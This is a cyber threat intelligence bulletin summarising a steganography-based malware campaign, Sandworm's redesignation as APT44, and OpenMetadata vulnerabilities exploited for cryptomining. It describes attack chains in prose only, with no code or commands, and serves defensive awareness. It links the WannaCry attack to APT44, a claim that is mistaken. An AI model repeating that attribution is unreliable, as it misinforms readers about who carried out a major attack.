Ransomware/Malware Activity
SteganoAmor Malware Campaign Hides Malicious Payloads via Steganography
Researchers at Positive Technologies have identified over 320 attacks in a malware campaign primarily targeting organizations in Latin America leveraging steganography to obfuscate malicious payloads. The hacking group TA558 is believed to be behind the operation. The SteganoAmor attack begins with a phishing email that is sent from compromised SMTP servers to exploit the positive reputation of existing domains. The phishing email contains Microsoft documents such as Excel or Word that are crafted to exploit a known Microsoft Equation Editor vulnerability tracked as CVE-2017-11882. This flaw is nearly seven (7) years old, and the exploit will check the version of Microsoft Office installed to determine whether it will advance to the next stage of the campaign which downloads a Visual Basic Script (VBS). The script grabs an image file which uses steganography to hide PowerShell code that downloads the final payload stored in a legitimate cloud service to evade detection by anti-virus tools. Researchers have seen multiple forms of malware delivered via the final payload including AgentTesla, Remcos, LokiBot, XWorm, and more. All are forms of either remote access tools or infostealers, designed to send stolen information back to the attacker on compromised FTP servers. The use of steganography in this attack provides an evasion technique not commonly seen in modern campaigns. However, the flaw in Equation Editor required to carry out the attack is quite old, meaning organizations with later versions of Microsoft Office are safe from the SteganoAmor campaign. CTIX analysts will continue to report on novel and evolving malware versions and associated campaigns.
Threat Actor Activity
Russian-backed Sandworm Hackers Upgraded to APT44 in Response to Heighted Threat Posed
The Sandworm hacking group, a threat actor with strong ties to Russia's Main Intelligence Directorate (GRU), and previously known as BlackEnergy, Seashell Blizzard, or Voodoo Bear, is now being tracked as APT44 due to the group’s highly adaptive nature and significant concern for risks they pose to governments and critical infrastructure organizations around the world. APT44 has been leveraging sophisticated cyber tactics to conduct espionage, sabotage, and influence operations on a global scale for a decade and a half. Active since at least 2009, this group has evolved its strategies over time, but their true strength has been particularly highlighted in the wake of Russia's invasion of Ukraine, showcasing their ability to support Russia's military campaign with cyber warfare capabilities. APT44 has adeptly used online personas and Telegram channels, such as XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek, to obfuscate its activities, posing as independent hacktivist groups while conducting operations that align with Russia's strategic interests. These platforms have been instrumental in leaking sensitive information, claiming responsibility for cyberattacks, and spreading narratives favorable to Russia, effectively blurring the lines between state-sponsored activities and grassroots hacktivism. The group's cyber operations have been wide-ranging and impactful, targeting not only Ukraine with data-wiping malware and other destructive attacks, but also targeting NATO countries' electoral systems and critical infrastructure across the US and Europe. APT44 has been linked to significant cyber incidents in the past, such as the deployment of NotPetya malware, the WannaCry ransomware attack, and disruptions to water utility infrastructure, including a recent overflow event in Texas. Recent reports underscore the adaptability and sophistication of APT44, highlighting their role in shaping Russia's cyber offensive capabilities. The group's continued focus on Ukraine, coupled with its targeting of countries where Russian interests intersect, signifies a persistent and severe threat to global security.
- The Register: Sandworm/APT44 Article
- Bleeping Computer: Sandworm/APT44 Article
- TechTarget: Sandworm/APT44 Article
Vulnerabilities
Attackers Exploit OpenMetadata Applications for Kubernetes Cryptomining Campaign
Threat actors have been observed exploiting multiple critical vulnerabilities in OpenMetadata, a popular open-source metadata management tool, to carry out a Kubernetes cryptomining campaign. The vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, include several critical remote code execution and authentication flaws, allowing attackers to hijack unpatched, internet-exposed OpenMetadata workloads. Since early April 2024, these vulnerabilities have enabled threat actors to execute code remotely, perform reconnaissance, and download cryptomining malware from a command-and-control (C2) server located in China. The attackers set up persistent access through cron jobs and Netcat reverse shells, and even leave notes pleading for Monero donations to buy a car or "suite" in China. This situation underscores the crucial importance of using strong authentication, keeping software up to date, and adhering to security best practices in containerized environments to prevent exploitation. CTIX analysts urge all OpenMetadata administrators to ensure their instances are up-to-date.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the CTIX Team (ctix@ankura.com) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
